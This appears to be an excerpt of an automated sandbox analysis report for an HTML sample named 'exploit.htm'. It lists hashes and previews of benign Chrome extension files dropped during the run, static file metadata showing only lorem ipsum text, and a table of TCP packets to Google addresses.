                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_window.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):261316
                                                                                                                                                            Entropy (8bit):5.444466092380538
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
                                                                                                                                                            MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                            SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                            SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                            SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\css\craw_window.css

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1741
                                                                                                                                                            Entropy (8bit):4.912380256743454
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
                                                                                                                                                            MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                            SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                            SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                            SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\html\craw_window.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):810
                                                                                                                                                            Entropy (8bit):4.723481385335562
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
                                                                                                                                                            MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                            SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                            SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                            SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\flapper.gif

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):70364
                                                                                                                                                            Entropy (8bit):7.119902236613185
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
                                                                                                                                                            MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                            SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                            SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                            SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_128.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4364
                                                                                                                                                            Entropy (8bit):7.915848007375225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
                                                                                                                                                            MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                            SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                            SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                            SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{*.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.*].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...|....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_16.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):558
                                                                                                                                                            Entropy (8bit):7.505638146035601
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
                                                                                                                                                            MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                            SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                            SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                            SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.|`......p...f.?.D$.y^..........y*...\..Z..t6..oRj.@&.u..G.qN).t.-V*.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):160
                                                                                                                                                            Entropy (8bit):5.475799237015411
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
                                                                                                                                                            MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                            SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                            SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                            SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_close.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):252
                                                                                                                                                            Entropy (8bit):6.512071394066515
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
                                                                                                                                                            MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                            SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                            SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                            SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_hover.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):160
                                                                                                                                                            Entropy (8bit):5.423186859407619
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
                                                                                                                                                            MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                            SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                            SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                            SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_maximize.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):166
                                                                                                                                                            Entropy (8bit):5.8155898293424775
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
                                                                                                                                                            MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                            SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                            SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                            SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_pressed.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):160
                                                                                                                                                            Entropy (8bit):5.46068685940762
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
                                                                                                                                                            MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                            SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                            SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                            SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1322
                                                                                                                                                            Entropy (8bit):5.449026004350873
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
                                                                                                                                                            MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                            SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                            SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                            SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):248531
                                                                                                                                                            Entropy (8bit):7.963657412635355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                            MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                            SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                            SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                            SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Entropy (8bit):4.758638141931997
                                                                                                                                                            TrID:
                                                                                                                                                            • HyperText Markup Language (12001/1) 51.06%
                                                                                                                                                            • HyperText Markup Language (11501/1) 48.94%
                                                                                                                                                            File name:exploit.htm
                                                                                                                                                            File size:5982
                                                                                                                                                            MD5:7f4b47b5be4df743220dda8f5595909a
                                                                                                                                                            SHA1:5b7e7eea20de3f9c89d7ff3cf21e256d0ee00e54
                                                                                                                                                            SHA256:2cdd875b905065d9e35e323eb56f8f5b1dca141be94da35f79daf833d88728a7
                                                                                                                                                            SHA512:e09214cca66cda3b0a0120985b19b029c7da40a560db9d0e8c80ee2f0988e655a5c452f8a1553bd5a86918ec2c92fbe622afda82302277c18ca839dc4321a6cb
                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG
                                                                                                                                                            TLSH:D8C1A7726E2A17004BE1137DA3DACCEFE354E41427D3AB94D8E99B2FB555A0C8713294
                                                                                                                                                            File Content Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 16, 2022 00:21:38.843961000 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:38.844002962 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.844093084 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:38.844495058 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:38.844516039 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.847352028 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:38.847395897 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.847481966 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:38.847693920 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:38.847718000 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.905045033 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.911303997 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.930811882 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:38.930867910 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.931057930 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:38.931087971 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.932020903 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.932117939 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:38.933244944 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.933330059 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:38.933490038 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.933568954 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.173078060 CEST49722443192.168.2.3172.217.168.45
